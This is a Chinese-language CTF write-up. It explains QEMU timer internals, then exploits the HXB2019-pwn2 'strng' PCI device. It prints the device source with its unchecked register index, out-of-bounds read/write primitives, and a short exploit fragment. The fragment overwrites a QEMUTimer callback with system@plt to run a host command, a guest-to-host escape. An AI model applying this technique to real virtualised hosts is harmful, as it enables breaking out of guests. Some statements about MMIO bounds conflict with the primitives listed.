1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 struct QEMUTimerList { QEMUClock *clock; QemuMutex active_timers_lock; QEMUTimer *active_timers; QLIST_ENTRY(QEMUTimerList) list ; QEMUTimerListNotifyCB *notify_cb; void *notify_opaque; QemuEvent timers_done_ev; }; typedef struct QEMUClock { QLIST_HEAD(, QEMUTimerList) timerlists; QEMUClockType type; bool enabled; } QEMUClock; struct QEMUTimer { int64_t expire_time; QEMUTimerList *timer_list; QEMUTimerCB *cb; void *opaque; QEMUTimer *next; int attributes; int scale; }; struct QemuMutex { pthread_mutex_t lock; #ifdef CONFIG_DEBUG_MUTEX const char *file; int line; #endif bool initialized; }; typedef enum { QEMU_CLOCK_REALTIME = 0 , QEMU_CLOCK_VIRTUAL = 1 , QEMU_CLOCK_HOST = 2 , QEMU_CLOCK_VIRTUAL_RT = 3 , QEMU_CLOCK_MAX } QEMUClockType; struct QEMUTimerListGroup { QEMUTimerList *tl[QEMU_CLOCK_MAX]; }; extern QEMUTimerListGroup main_loop_tlg;
各个结构之间的关系如下:
classDiagram
direction LR
class QEMUTimer {
expire_time : int64_t (0x00)
timer_list : QEMUTimerList* (0x08)
cb : QEMUTimerCB* (0x10)
opaque : void* (0x18)
next : QEMUTimer* (0x20)
attributes : int (0x28)
scale : int (0x2C)
size : 0x30
}
class QemuMutex {
lock : pthread_mutex_t (0x00, 0x28)
initialized : bool (0x28)
size : 0x30
}
class QEMUClock {
timerlists_lh_first : QEMUTimerList* (0x00)
type : QEMUClockType (0x08)
enabled : bool (0x0C)
size : 0x10
}
class QEMUTimerList {
clock : QEMUClock* (0x00)
active_timers_lock : QemuMutex (0x08, 0x30)
active_timers : QEMUTimer* (0x38)
list.le_next : QEMUTimerList* (0x40)
list.le_prev : QEMUTimerList** (0x48)
notify_cb : QEMUTimerListNotifyCB* (0x50)
notify_opaque : void* (0x58)
timers_done_ev : QemuEvent (0x60, 0x08)
size : 0x68
}
class QEMUTimerListGroup {
tl_0_REALTIME : QEMUTimerList* (0x00)
tl_1_VIRTUAL : QEMUTimerList* (0x08)
tl_2_HOST : QEMUTimerList* (0x10)
tl_3_VIRTUAL_RT: QEMUTimerList* (0x18)
size : 0x20
}
QEMUClock o-- QEMUTimerList : timerlists
QEMUTimerList --> QEMUClock : clock
QEMUTimerList o-- QEMUTimer : active_timers
QEMUTimer --> QEMUTimer : next
QEMUTimer --> QEMUTimerList : timer_list
QEMUTimerList --> QemuMutex : active_timers_lock
QEMUTimerListGroup o-- QEMUTimerList : tl_*
QEMUTimer 使用 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 typedef struct { QEMUTimer *tmr; int64_t period_ns; } MyDev; static void my_cb (void *opaque) { MyDev *s = opaque; } static void my_realize (MyDev *s) { s->tmr = timer_new_ns(QEMU_CLOCK_VIRTUAL, my_cb, s); s->period_ns = 5 * 1000 * 1000 ; int64_t now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); timer_mod_ns(s->tmr, now + s->period_ns); } static void my_unrealize (MyDev *s) { timer_free(s->tmr); }
timer_new_* 函数创建一个 QEMUTimer 结构。最终都会调用到 timer_init_full 函数。
pwndbg> bt
#0 timer_init_full (ts=0x55555580e330 <_start>, timer_list_group=0x7fffffffd9e0, type=QEMU_CLOCK_REALTIME, scale=48, attributes=256, cb=0x7ffff76bab95 <__libc_calloc+133>, opaque=0x0) at ../util/qemu-time 1
#1 0x0000555555c914e2 in timer_new_full (timer_list_group=0x0, type=QEMU_CLOCK_VIRTUAL_RT, scale=1, attributes=0, cb=0x555555c916c5 <cpu_throttle_timer_tick>, opaque=0x0) at /home/flyyy/Desktop/qemu-vul/q 4
#2 0x0000555555c91527 in timer_new (type=QEMU_CLOCK_VIRTUAL_RT, scale=1, cb=0x555555c916c5 <cpu_throttle_timer_tick>, opaque=0x0) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/qemu/timer.h :544
#3 0x0000555555c91553 in timer_new_ns (type=QEMU_CLOCK_VIRTUAL_RT, cb=0x555555c916c5 <cpu_throttle_timer_tick>, opaque=0x0) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/qemu/timer.h :562
#4 0x0000555555c9189b in cpu_throttle_init () at ../softmmu/cpu-throttle.c :120
#5 0x0000555555c41869 in cpu_timers_init () at ../softmmu/cpu-timers.c :278
#6 0x0000555555be5b99 in qemu_init (argc=18, argv=0x7fffffffdda8, envp=0x7fffffffde40) at ../softmmu/vl.c :4256
#7 0x000055555580e445 in main (argc=18, argv=0x7fffffffdda8, envp=0x7fffffffde40) at ../softmmu/main.c :49
#8 0x00007ffff7643083 in __libc_start_main (main=0x55555580e419 <main>, argc=18, argv=0x7fffffffdda8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdd98) at .. 8
#9 0x000055555580e35e in _start ()
该函数初始化 QEMUTimer 结构,其中 expire_time 被设置为 -1,因此默认不会调用回调函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 void timer_init_full (QEMUTimer *ts, QEMUTimerListGroup *timer_list_group, QEMUClockType type, int scale, int attributes, QEMUTimerCB *cb, void *opaque) { if (!timer_list_group) { timer_list_group = &main_loop_tlg; } ts->timer_list = timer_list_group->tl[type]; ts->cb = cb; ts->opaque = opaque; ts->scale = scale; ts->attributes = attributes; ts->expire_time = -1 ; }
之后 timer_mod_ns() 把定时器插入按到期时间排序 的链表;如果它成了新的表头 ,框架会打断 poll 并重算 deadline (rearm),以便尽快触发。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 void timer_mod_ns (QEMUTimer *ts, int64_t expire_time) { QEMUTimerList *timer_list = ts->timer_list; bool rearm; qemu_mutex_lock(&timer_list->active_timers_lock); timer_del_locked(timer_list, ts); rearm = timer_mod_ns_locked(timer_list, ts, expire_time); qemu_mutex_unlock(&timer_list->active_timers_lock); if (rearm) { timerlist_rearm(timer_list); } } static bool timer_mod_ns_locked (QEMUTimerList *timer_list, QEMUTimer *ts, int64_t expire_time) { QEMUTimer **pt, *t; pt = &timer_list->active_timers; for (;;) { t = *pt; if (!timer_expired_ns(t, expire_time)) { break ; } pt = &t->next; } ts->expire_time = MAX(expire_time, 0 ); ts->next = *pt; qatomic_set(pt, ts); return pt == &timer_list->active_timers; }
QEMUTimerList 回调 QEMUTimerList 的 notify_cb 回调是唤醒/通知事件循环 的回调,不处理业务。该回调函数的定义如下:
1 typedef void QEMUTimerCB (void *opaque) ;
它的职责是当“最早到期点 发生变化,或者某条时钟被重新启用”时,打断 poll/epoll 睡眠 并触发重新计算 deadline 。如果未设置 notify_cb,默认走 qemu_notify_event()。
典型触发路径是 “最早到期点变了 → 需要重置 poll 超时/打断睡眠” 。例如当对一个定时器执行 timer_mod*(),且它成为表头(新的最早到期) 或从无到有 :timer_mod*() → timer_mod_ns_locked() 插入排序 → 返回需要 rearm → timerlist_rearm() → **timerlist_notify() → notify_cb(opaque)**(若未设置则 qemu_notify_event())。
pwndbg> bt
#0 qemu_timer_notify_cb (opaque=0x1c1768ab8f0, type=QEMU_CLOCK_REALTIME) at ../softmmu/cpu-timers.c :243
#1 0x0000555555e9c62d in timerlist_notify (timer_list=0x55555691b1e0) at ../util/qemu-timer.c :300
#2 0x0000555555e9c9b9 in timerlist_rearm (timer_list=0x55555691b1e0) at ../util/qemu-timer.c :424
#3 0x0000555555e9cae2 in timer_mod_ns (ts=0x55555696bfa0, expire_time=895342000368) at ../util/qemu-timer.c :452
#4 0x0000555555e9cc28 in timer_mod (ts=0x55555696bfa0, expire_time=895342000368) at ../util/qemu-timer.c :481
#5 0x0000555555b918ce in apic_timer_update (s=0x55555689d800, current_time=893574944608) at ../hw/intc/apic.c :623
#6 0x0000555555b91f4d in apic_mem_write (opaque=0x55555689d800, addr=896, val=110440984, size=4) at ../hw/intc/apic.c :826
#7 0x0000555555c08105 in memory_region_write_accessor (mr=0x55555689d890, addr=896, value=0x7ffff504be98, size=4, shift=0, mask=4294967295, attrs=...) at ../softmmu/memory.c :491
#8 0x0000555555c0833c in access_with_adjusted_size (addr=896, value=0x7ffff504be98, size=4, access_size_min=1, access_size_max=4, access_fn=0x555555c08018 <memory_region_write_accessor>, mr=0x55555689d8902
#9 0x0000555555c0b3ef in memory_region_dispatch_write (mr=0x55555689d890, addr=896, data=110440984, op=MO_32, attrs=...) at ../softmmu/memory.c :1501
#10 0x0000555555bc8b0c in io_writex (env=0x5555569448d0, iotlbentry=0x7fffa868c1e0, mmu_idx=2, val=110440984, addr=18446744073699054464, retaddr=140736193352078, op=MO_32) at ../accel/tcg/cputlb.c :1378
#11 0x0000555555bcb3d5 in store_helper (env=0x5555569448d0, addr=18446744073699054464, val=110440984, oi=34, retaddr=140736193352078, op=MO_32) at ../accel/tcg/cputlb.c :2397
#12 0x0000555555bcb64d in helper_le_stl_mmu (env=0x5555569448d0, addr=18446744073699054464, val=110440984, oi=34, retaddr=140736193352078) at ../accel/tcg/cputlb.c :2463
#13 0x00007fffb2cfd18e in code_gen_buffer ()
#14 0x0000555555b95552 in cpu_tb_exec (cpu=0x55555693c070, itb=0x7fffb306c500 <code_gen_buffer+12760275>) at ../accel/tcg/cpu-exec.c :178
#15 0x0000555555b96403 in cpu_loop_exec_tb (cpu=0x55555693c070, tb=0x7fffb306c500 <code_gen_buffer+12760275>, last_tb=0x7ffff504c5b8, tb_exit=0x7ffff504c5b0) at ../accel/tcg/cpu-exec.c :658
#16 0x0000555555b966fb in cpu_exec (cpu=0x55555693c070) at ../accel/tcg/cpu-exec.c :771
#17 0x0000555555bab751 in tcg_cpu_exec (cpu=0x55555693c070) at ../accel/tcg/tcg-cpus.c :243
#18 0x0000555555babcc2 in tcg_cpu_thread_fn (arg=0x55555693c070) at ../accel/tcg/tcg-cpus.c :427
#19 0x0000555555e77a29 in qemu_thread_start (args=0x55555696b890) at ../util/qemu-thread-posix.c :521
#20 0x00007ffff781b609 in start_thread (arg=<optimized out>) at pthread_create.c :477
#21 0x00007ffff773e353 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S :95
或者重新启用某条时钟:qemu_clock_enable(type, true) 若从禁用变为启用 → qemu_clock_notify(type) → 遍历该时钟挂着的所有 QEMUTimerList 调 timerlist_notify() → **notify_cb(opaque)**。这种情景没有上一种常见。
timerlist_notify 函数定义如下:
1 2 3 4 5 6 7 8 void timerlist_notify (QEMUTimerList *timer_list) { if (timer_list->notify_cb) { timer_list->notify_cb(timer_list->notify_opaque, timer_list->clock->type); } else { qemu_notify_event(); } }
QEMUTimer 回调 QEMUTimer 的 cb 回调是定时器真正的业务回调 。当该定时器到期、且被从 active_timers 链表摘下后,在释放链表锁 的情况下调用 cb(opaque)。如果需要周期性行为,要在回调里自行 timer_mod*() 重新安排到下一次到期。
在事件循环一轮检查中,timerlist_run_timers() 读取当前时钟时间,只要表头定时器 expire_time <= now 就触发 : 它会先把该定时器从链表摘下 、将 expire_time 置为 -1,然后在无锁 状态下调用 **cb(opaque)**。若还有更多已到期的表头,继续循环处理。
pwndbg> bt
#0 0x0000555555e9cd99 in timerlist_run_timers (timer_list=0x55555691b1e0) at ../util/qemu-timer.c :545
#1 0x0000555555e9cf28 in qemu_clock_run_timers (type=QEMU_CLOCK_VIRTUAL) at ../util/qemu-timer.c :588
#2 0x0000555555e9d20a in qemu_clock_run_all_timers () at ../util/qemu-timer.c :670
#3 0x0000555555ea1763 in main_loop_wait (nonblocking=0) at ../util/main-loop.c :531
#4 0x0000555555bde240 in qemu_main_loop () at ../softmmu/vl.c :1678
#5 0x000055555580e44a in main (argc=18, argv=0x7fffffffdda8, envp=0x7fffffffde40) at ../softmmu/main.c :50
#6 0x00007ffff7643083 in __libc_start_main (main=0x55555580e419 <main>, argc=18, argv=0x7fffffffdda8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdd98) at .. 8
#7 0x000055555580e35e in _start ()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 bool qemu_clock_run_all_timers (void ) { bool progress = false ; QEMUClockType type; for (type = 0 ; type < QEMU_CLOCK_MAX; type++) { if (qemu_clock_use_for_deadline(type)) { progress |= qemu_clock_run_timers(type); } } return progress; } bool qemu_clock_run_timers (QEMUClockType type) { return timerlist_run_timers(main_loop_tlg.tl[type]); } bool timerlist_run_timers (QEMUTimerList *timer_list) { QEMUTimer *ts; int64_t current_time; bool progress = false ; QEMUTimerCB *cb; void *opaque; if (!qatomic_read(&timer_list->active_timers)) { return false ; } qemu_event_reset(&timer_list->timers_done_ev); if (!timer_list->clock->enabled) { goto out; } switch (timer_list->clock->type) { case QEMU_CLOCK_REALTIME: break ; default : case QEMU_CLOCK_VIRTUAL: break ; case QEMU_CLOCK_HOST: if (!replay_checkpoint(CHECKPOINT_CLOCK_HOST)) { goto out; } break ; case QEMU_CLOCK_VIRTUAL_RT: if (!replay_checkpoint(CHECKPOINT_CLOCK_VIRTUAL_RT)) { goto out; } break ; } current_time = qemu_clock_get_ns(timer_list->clock->type); qemu_mutex_lock(&timer_list->active_timers_lock); while ((ts = timer_list->active_timers)) { if (!timer_expired_ns(ts, current_time)) { break ; } if (replay_mode != REPLAY_MODE_NONE && timer_list->clock->type == QEMU_CLOCK_VIRTUAL && !(ts->attributes & QEMU_TIMER_ATTR_EXTERNAL) && !replay_checkpoint(CHECKPOINT_CLOCK_VIRTUAL)) { qemu_mutex_unlock(&timer_list->active_timers_lock); goto out; } timer_list->active_timers = ts->next; ts->next = NULL ; ts->expire_time = -1 ; cb = ts->cb; opaque = ts->opaque; qemu_mutex_unlock(&timer_list->active_timers_lock); cb(opaque); qemu_mutex_lock(&timer_list->active_timers_lock); progress = true ; } qemu_mutex_unlock(&timer_list->active_timers_lock); out: qemu_event_set(&timer_list->timers_done_ev); return progress; }
因此我们可以通过修改 main_loop_tlg 中指向的 QEMUTimerList 的 active_timers 指向的 QEMUTimer 的 cb 回调函数指针来劫持程序执行流。
通常 QEMUTimer 的 expire_time 需要设置为 0,否则不满足 timer_head->expire_time <= current_time 无法调用回调。
1 2 3 4 static bool timer_expired_ns (QEMUTimer *timer_head, int64_t current_time) { return timer_head && (timer_head->expire_time <= current_time); }
HXB2019-pwn2 虚拟机密码为 root
环境搭建 缺少 libiscsi.so.2,需要编译相关依赖:
1 2 3 4 5 6 7 8 9 sudo apt updatesudo apt install -y autoconf automake libtool pkg-config gettext \ make gcc g++ git clone https://github.com/sahlberg/libiscsi.git cd libiscsi./autogen.sh ./configure make
将编译好的 libiscsi.so.11.0.2 替换上去即可。
1 patchelf --replace-needed libiscsi.so.2 ./libiscsi.so.11.0.2 qemu-system-x86_64
漏洞分析 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 #include "qemu/osdep.h" #include "qemu/timer.h" #include "qemu/module.h" #include "qom/object.h" #include "hw/pci/pci.h" #include "exec/memory.h" #include <stdlib.h> #define TYPE_STRNG "strng" #define STRNG(obj) OBJECT_CHECK(STRNGState, (obj), TYPE_STRNG) typedef struct STRNGState { PCIDevice pdev; MemoryRegion mmio; MemoryRegion pmio; uint32_t addr; uint32_t flag; uint32_t regs[64 ]; QEMUTimer strng_timer; } STRNGState; static void strng_instance_init (Object *obj) ;static void strng_class_init (ObjectClass *oc, void *data) ;static void strng_timer (void *opaque) ;static void pci_strng_uninit (PCIDevice *pdev) ;static void pci_strng_realize (PCIDevice *pdev, Error **errp) ;static uint64_t strng_mmio_read (void *opaque, hwaddr addr, unsigned size) ;static void strng_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) ;static uint64_t strng_pmio_read (void *opaque, hwaddr addr, unsigned size) ;static void strng_pmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) ;static const MemoryRegionOps strng_mmio_ops = { .read = strng_mmio_read, .write = strng_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, }; static const MemoryRegionOps strng_pmio_ops = { .read = strng_pmio_read, .write = strng_pmio_write, .endianness = DEVICE_NATIVE_ENDIAN, }; static void strng_timer (void *opaque) { STRNGState *s = opaque; s->flag = 0 ; } static void strng_pmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) { STRNGState *s = opaque; if (size == 4 ) { if (addr == 0 ) { s->addr = (uint32_t )val; } else if (addr == 4 ) { if ((s->addr & 3 ) == 0 ) { uint32_t index = s->addr >> 2 ; if (index == 1 ) { s->regs[1 ] = rand(); } else if (index != 0 ) { if (index == 3 ) { s->regs[3 ] = rand_r(&s->regs[2 ]); } else { s->regs[index] = (uint32_t )val; if (s->flag) { int64_t now = qemu_clock_get_ms(QEMU_CLOCK_VIRTUAL); timer_mod(&s->strng_timer, now + 100 ); } } } else { srand((unsigned )val); } } } else { } } else { } } static uint64_t strng_pmio_read(void *opaque, hwaddr addr, unsigned size){ STRNGState *s = opaque; if (size != 4 ) { return (uint64_t )-1 ; } if (addr == 0 ) { return s->addr; } if (addr == 4 ) { if ((s->addr & 3 ) != 0 ) { return (uint64_t )-1 ; } return s->regs[s->addr >> 2 ]; } return (uint64_t )-1 ; } static void strng_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) { STRNGState *s = opaque; uint32_t seed = (uint32_t )val; if (size == 4 && ((addr & 3 ) == 0 )) { uint32_t index = addr >> 2 ; if (index == 1 ) { s->regs[1 ] = rand(); } else if (index != 0 ) { if (index == 3 ) { s->regs[3 ] = rand_r(&s->regs[2 ]); } s->flag = 1 ; s->regs[index] = seed; } else { srand((unsigned )val); } } else { } } static uint64_t strng_mmio_read(void *opaque, hwaddr addr, unsigned size){ STRNGState *s = opaque; if (size == 4 && ((addr & 3 ) == 0 )) { return s->regs[addr >> 2 ]; } return (uint64_t )-1 ; } static void pci_strng_uninit (PCIDevice *pdev) { STRNGState *s = STRNG(pdev); timer_del(&s->strng_timer); } static void pci_strng_realize (PCIDevice *pdev, Error **errp) { STRNGState *s = STRNG(pdev); timer_init_ms(&s->strng_timer, QEMU_CLOCK_VIRTUAL, strng_timer, s); memory_region_init_io(&s->mmio, OBJECT(pdev), &strng_mmio_ops, s, "strng-mmio" , 0x100 ); pci_register_bar(pdev, 0 , PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio); memory_region_init_io(&s->pmio, OBJECT(pdev), &strng_pmio_ops, s, "strng-pmio" , 8 ); pci_register_bar(pdev, 1 , PCI_BASE_ADDRESS_SPACE_IO, &s->pmio); } static void strng_instance_init (Object *obj) { STRNGState *s = STRNG(obj); s->flag = 0 ; } static void strng_class_init (ObjectClass *oc, void *data) { PCIDeviceClass *k = PCI_DEVICE_CLASS(oc); k->realize = pci_strng_realize; k->exit = pci_strng_uninit; k->vendor_id = 0x1234 ; k->device_id = 0x11E9 ; k->revision = 0x10 ; k->class_id = PCI_CLASS_OTHERS; } static const TypeInfo strng_info = { .name = TYPE_STRNG, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof (STRNGState), .instance_init = strng_instance_init, .class_init = strng_class_init, }; static void pci_strng_register_types (void ) { type_register_static(&strng_info); } type_init(pci_strng_register_types)
设备读写函数分析如下:
1 strng_mmio_read(void *opaque, hwaddr addr, unsigned size);
条件:size==4 且 addr%4==0,否则返回 -1。
返回:regs[addr>>2]。由于 BAR0 长度被固定为 0x100,QEMU 只会把 addr in [0,0xFC] 的访问转进来,因此 无越界 。
1 strng_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size);
前置:size==4 且 addr%4==0,令 idx=addr>>2
idx==0(addr==0):srand(val)
idx==1(addr==4):regs[1] = rand()(不会 置 flag)
idx==3(addr==12):先 regs[3] = rand_r(®s[2]),再 flag=1; regs[3] = (uint32_t)val(随机数被覆盖,regs[2] 的种子被 rand_r 更新)
其他 idx in {2,4..63}:flag=1; regs[idx]=(uint32_t)val,依赖 BAR0=0x100 的边界,不会越界 。
1 strng_pmio_read(void *opaque, hwaddr addr, unsigned size);
1 strng_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size);
漏洞利用 越界读原语:
利用 mmio_read 传递 offset << 2 即可读取 regs[offset] 处的四字节值;
利用 pmio_write 设置 opaque->addr = offset << 2 ,调用 pmio_read 读取 regs[offset] 处的四字节 值;
越界写原语:
利用 mmio_write 传递 offset << 2 即可写 regs[offset] 处的四字节值为 val;
利用 pmio_write 设置 opaque->addr = offset << 2 ,调用 pmio_write 写 regs[offset] 处的四字节 值为 val;
设备在 pci_strng_realize() 里把 BAR0(MMIO)大小固定成 0x100 字节 ,并且 MemoryRegionOps.valid 也限定只允许 4 字节且 4 字节对齐 的访问。
1 2 3 4 memory_region_init_io(&s->mmio, OBJECT(pdev), &strng_mmio_ops, s, "strng-mmio" , 0x100 ); pci_register_bar(pdev, 0 , PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio);
调试发现 STRNGState 结构体的内容如下,其中 strng_timer 的 cb 和 opaque 分别可以泄露 qemu 和 STRNGState 地址。
pwndbg> p *(STRNGState*)0x555558d0d870
$1 = {
pdev = {...},
mmio = {...},
pmio = {...},
addr = 0,
flag = 0,
regs = {0 <repeats 64 times>},
strng_timer = {
expire_time = -1,
timer_list = 0x5555574dedd0 ,
cb = 0x55555569ac8e <strng_timer >,
opaque = 0x555558d0d870 ,
next = 0x0 ,
scale = 1000000
}
}
pwndbg> telescope &((STRNGState*)0x555558d0d870)->regs 40
00:0000│ 0x555558d0e368 ◂— 0
... ↓ 31 skipped
20:0100│ 0x555558d0e468 ◂— 0xffffffffffffffff
21:0108│ 0x555558d0e470 —▸ 0x5555574dedd0 —▸ 0x555556475700 (qemu_clocks+32) —▸ 0x5555574df480 ◂— 0x555556475700 (qemu_clocks+32)
22:0110│ 0x555558d0e478 —▸ 0x55555569ac8e (strng_timer) ◂— push rbp
23:0118│ 0x555558d0e480 —▸ 0x555558d0d870 —▸ 0x5555574ba8d0 —▸ 0x555557451720 —▸ 0x5555574518a0 ◂— ...
24:0120│ 0x555558d0e488 ◂— 0
25:0128│ 0x555558d0e490 ◂— 0xf4240
26:0130│ 0x555558d0e498 ◂— 0
27:0138│ 0x555558d0e4a0 ◂— 0
如果考虑修改 main_loop_tlg 实现虚拟机逃逸,由于 main_loop_tlg 位于 qemu 上,地址小于堆地址,而越界写 regs[opaque->addr >> 2] = val 无法将下标设为负数,因此考虑其他方法。
在 pci_strng_realize 函数中有对 strng_timer 的初始化,这里 QEMU_CLOCK_VIRTUAL = 1 。
1 2 timer_init_ms(&s->strng_timer, QEMU_CLOCK_VIRTUAL, strng_timer, s);
该函数有如下调用链:
pwndbg> bt
#0 timer_init_tl (ts =0x7fffffffd6a0, timer_list =0x5555558b107c <pci_set_word+36>, scale =32767, cb =0x555558d0f3a6, opaque =0xf90058d0f294) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :336
#1 0x000055555569ac4f in timer_init (ts =0x555558d0e468, type =QEMU_CLOCK_VIRTUAL, scale =1000000, cb =0x55555569ac8e <strng_timer>, opaque =0x555558d0d870) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/include/qemu/timer.h :442
#2 0x000055555569ac8b in timer_init_ms (ts =0x555558d0e468, type =QEMU_CLOCK_VIRTUAL, cb =0x55555569ac8e <strng_timer>, opaque =0x555558d0d870) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/include/qemu/timer.h :499
#3 0x000055555569afe2 in pci_strng_realize (pdev =0x555558d0d870, errp =0x7fffffffd708) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/hw/misc/strng.c :148
timer_init_tl 设置 expire_time 为 -1,因此不会回调 cb 函数指针。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 struct QEMUTimer { int64_t expire_time; QEMUTimerList *timer_list; QEMUTimerCB *cb; void *opaque; QEMUTimer *next; int attributes; int scale; }; void timer_init_tl (QEMUTimer *ts, QEMUTimerList *timer_list, int scale, QEMUTimerCB *cb, void *opaque) { ts->timer_list = timer_list; ts->cb = cb; ts->opaque = opaque; ts->scale = scale; ts->expire_time = -1 ; }
从前面的调试结果可以看到 STRNGState.flag 初始值为 0 ,但是在 strng_mmio_write 函数中如果 index 不为 0 则会设置 s->flag = 1。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 static void strng_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) { STRNGState *s = opaque; uint32_t seed = (uint32_t )val; if (size == 4 && ((addr & 3 ) == 0 )) { uint32_t index = addr >> 2 ; if (index == 1 ) { s->regs[1 ] = rand(); } else if (index != 0 ) { if (index == 3 ) { s->regs[3 ] = rand_r(&s->regs[2 ]); } s->flag = 1 ; s->regs[index] = seed; } else { srand((unsigned )val); } } else { } }
而在 strng_pmio_write 函数中如果如果 opaque->flag 非零会执行如下代码:
1 2 3 4 5 6 7 s->regs[index] = (uint32_t )val; if (s->flag) { int64_t now = qemu_clock_get_ms(QEMU_CLOCK_VIRTUAL); timer_mod(&s->strng_timer, now + 100 ); }
timer_mod 函数有如下调用栈:
pwndbg> bt
#0 timer_mod_ns_locked (timer_list =0x5555574dedd0, ts =0x55555755c7d8, expire_time =38581000000) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :388
#1 0x00005555559c4458 in timer_mod_ns (ts =0x55555755c7d8, expire_time =38581000000) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :424
#2 0x00005555559c455b in timer_mod (ts =0x55555755c7d8, expire_time =38581) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :458
#3 0x000055555569af88 in strng_pmio_write (opaque =0x55555755bbe0, addr =4, val =1465239272, size =4) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/hw/misc/strng.c :132
其中 timer_mod_ns_locked 函数定义如下,也就是说这里会将该定时任务时间 expire_time 设置为 now + 100 ,并且将 opaque->strng_timer 添加到定时任务。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 static bool timer_mod_ns_locked (QEMUTimerList *timer_list, QEMUTimer *ts, int64_t expire_time) { QEMUTimer **pt, *t; pt = &timer_list->active_timers; for (;;) { t = *pt; if (!timer_expired_ns(t, expire_time)) { break ; } pt = &t->next; } ts->expire_time = MAX(expire_time, 0 ); ts->next = *pt; *pt = ts; return pt == &timer_list->active_timers; }
因此不难想到可以修改 opaque->strng_timer 的 cb 为 system@plt 然后将 opaque->strng_timer 的 opaque 指向参数地址,从而实现任意命令执行。不过需要注意在修改上述位置之后,需要调用 timer_mod 才能触发。
1 2 3 4 5 6 ab_write(0x110 , system_plt); ab_write(0x118 , STRNGState_addr + 0xaf8 + 0x14 ); mmio_write32(2 << 2 , 0xdeadbeef ); pio_write32(0 , 2 << 2 ); pio_write32(1 << 2 , 0xdeadbeef );
调用栈如下:
pwndbg> bt
#0 __libc_system (line =0x555558d0e37c "/usr/bin/gnome-calculator") at ../sysdeps/posix/system.c :198
#1 0x00005555559c473d in timerlist_run_timers (timer_list =0x5555574dedd0) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :528
#2 0x00005555559c4786 in qemu_clock_run_timers (type =QEMU_CLOCK_VIRTUAL) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :539
#3 0x00005555559c4b1f in qemu_clock_run_all_timers () at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :653
#4 0x00005555559c36c8 in main_loop_wait (nonblocking =0) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/main-loop.c :516
#5 0x000055555578a2ef in main_loop () at /home/w0lfzhang/Desktop/qemu-2.8.1.1/vl.c :1966
#6 0x0000555555791821 in main (argc =19, argv =0x7fffffffde98, envp =0x7fffffffdf38) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/vl.c :4684
